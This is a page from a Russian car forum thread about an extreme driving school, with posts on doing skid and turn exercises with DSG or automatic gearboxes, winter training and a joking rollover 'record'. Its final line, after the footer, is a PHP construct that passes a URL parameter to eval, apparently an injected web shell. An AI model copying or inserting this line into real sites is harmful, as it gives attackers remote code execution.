+ Ответить в теме
Страница 3 из 5 ПерваяПервая 1 2 3 4 5 ПоследняяПоследняя
Показано с 21 по 30 из 42

Тема: Школа экстремального вождения


  1. #21
    GTI-Racing chess is on a distinguished road Аватар для chess
    Регистрация
    29.11.2006
    Откуда
    москвабад
    Машина
    CTR ЕК9, MPS K90, vw polo 6r
    Сообщений
    1,603
    +1 есть ли смысл делать это на дсг? половину упражнений на ней не сделать. например тот же "милицейский разворот". вернее можно но один раз. потом менять коробку.
    на ручке все понятно.
    вобще я уже на шипах, да и многие тоже. нет ли смысла до снега подождать?
    каждому своё
    АДМ GTI mkV st1.5 - 2.01.084
    АДМ Civic Type-R EK9 - 1.57.683
    Смоленск Civic Type-R EK9 - 1.47.690
    Нижний Новгород Civic Type-R EK9 - 1.53.472
    Казань Civic Type-R EK9 - 1.43.187
    MRW Civic Type-R EK9 - 2.01.663

  2. #22
    <div class='quotetop'>Цитата(chess &#064; Nov 8 2007, 12&#58;19) <{POST_SNAPBACK}></div><div class='quotemain'>+1 есть ли смысл делать это на дсг? половину упражнений на ней не сделать. например тот же "милицейский разворот". вернее можно но один раз. потом менять коробку.
    на ручке все понятно.
    вобще я уже на шипах, да и многие тоже. нет ли смысла до снега подождать?[/b][/quote]


    Не совсем так.. 180 градусов делаются легко, это и есть тот самый "разворот". 360 на ней тоже делается, но чуть сложнее. Реально ограничений не так много, и я не совсем про дсг как-раз интересовался На ДСГ как раз весь почти комплекс упражнений сделать можно.

  3. #23
    Мимо проходил vladklepach is on a distinguished road Аватар для vladklepach
    Регистрация
    26.09.2007
    Сообщений
    10
    Тема хорошая и правильная. Лучший тюнинг - тюнинг прокладки между рулём и сиденьем. Деньги, кстати, очень небольшие. Я бы поехал, хотя и так тренируюсь у своих людей. Зависит от того, какая программа и в чём можно будет потренироваться.

  4. #24
    Упражнений для обучений куча. Программа 3х часовая. Не больше 5ти человек. Об изменении элементов говорить рано. Надо посмотреть, как вы выполняете стандартные упражнения. Ввести машину в занос и даже вывести ее, наверное могут многие, а вот сделать это правильно, думаю не много народу это сможет.
    Что касается АКПП, в принципе ничего страшного нет. И на ней тоже можно.
    Еще не мало важно провести теоретический курс, а то начнете гонять боком по Москве. У меня два ученика, решили, что все могут и разложили свои автомобили. Один даже не смог из Тушино уехать, прям там и разложил.

  5. #25
    <div class='quotetop'>Цитата(chess &#064; Nov 8 2007, 11&#58;19) <{POST_SNAPBACK}></div><div class='quotemain'>+1 есть ли смысл делать это на дсг? половину упражнений на ней не сделать. например тот же "милицейский разворот". вернее можно но один раз. потом менять коробку.
    на ручке все понятно.
    вобще я уже на шипах, да и многие тоже. нет ли смысла до снега подождать?[/b][/quote]

    На ней можно вальс танцевать на машине. Голова закружитя от разворотов. Там можно делать все что хочешь.

  6. #26
    Зимой тоже можно заниматься, даже нужно. Зимой просто у нас не так много времени. Подготовка к зимнему чемпионату. Но я думаю найдем время.
    Очень хорошая трасса в Крылатском на гребном канале. Если конечно он в этом году замерзнет. Я там кстати рекорд поставил по перевороту. Еще ни кто не побил. Два раза в воздухе и шесть оборотов до полной остановки.

  7. #27
    <div class='quotetop'>Цитата(Maxx &#064; Nov 8 2007, 14&#58;11) <{POST_SNAPBACK}></div><div class='quotemain'>Зимой тоже можно заниматься, даже нужно. Зимой просто у нас не так много времени. Подготовка к зимнему чемпионату. Но я думаю найдем время.
    Очень хорошая трасса в Крылатском на гребном канале. Если конечно он в этом году замерзнет. Я там кстати рекорд поставил по перевороту. Еще ни кто не побил. Два раза в воздухе и шесть оборотов до полной остановки.[/b][/quote]
    :D :D :D Маладец&#33;

  8. #28
    <div class='quotetop'>Цитата(Maxx &#064; Nov 8 2007, 15&#58;11) <{POST_SNAPBACK}></div><div class='quotemain'>Два раза в воздухе и шесть оборотов до полной остановки.[/b][/quote]


    Это входит в курс обучения?

    ЗЫ: Ушел на автору покупать машину

  9. #29
    ух как расписал все, терь хочу-хочу.... но гольфа в воздух запускать пока не собираюсь)

  10. #30
    <div class='quotetop'>Цитата(Griffin &#064; Nov 8 2007, 14&#58;43) <{POST_SNAPBACK}></div><div class='quotemain'>Это входит в курс обучения?

    ЗЫ: Ушел на автору покупать машину [/b][/quote]

    Любой каприз за ваши деньги

+ Ответить в теме
Страница 3 из 5 ПерваяПервая 1 2 3 4 5 ПоследняяПоследняя

Похожие темы

  1. Обувь для вождения
    от *NITRO* в разделе Курилка
    Ответов: 37
    Последнее сообщение: 12.06.2014, 12:32
  2. Школа водительского мастерства
    от Kamich в разделе Курилка
    Ответов: 4
    Последнее сообщение: 21.11.2011, 20:10
  3. Спорт школа Driving art
    от davv в разделе Авто спорт
    Ответов: 11
    Последнее сообщение: 27.05.2009, 10:59
  4. Ответов: 263
    Последнее сообщение: 03.04.2009, 21:22
  5. Курсы Вождения
    от ААГ в разделе Курилка
    Ответов: 2
    Последнее сообщение: 01.07.2008, 12:49

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}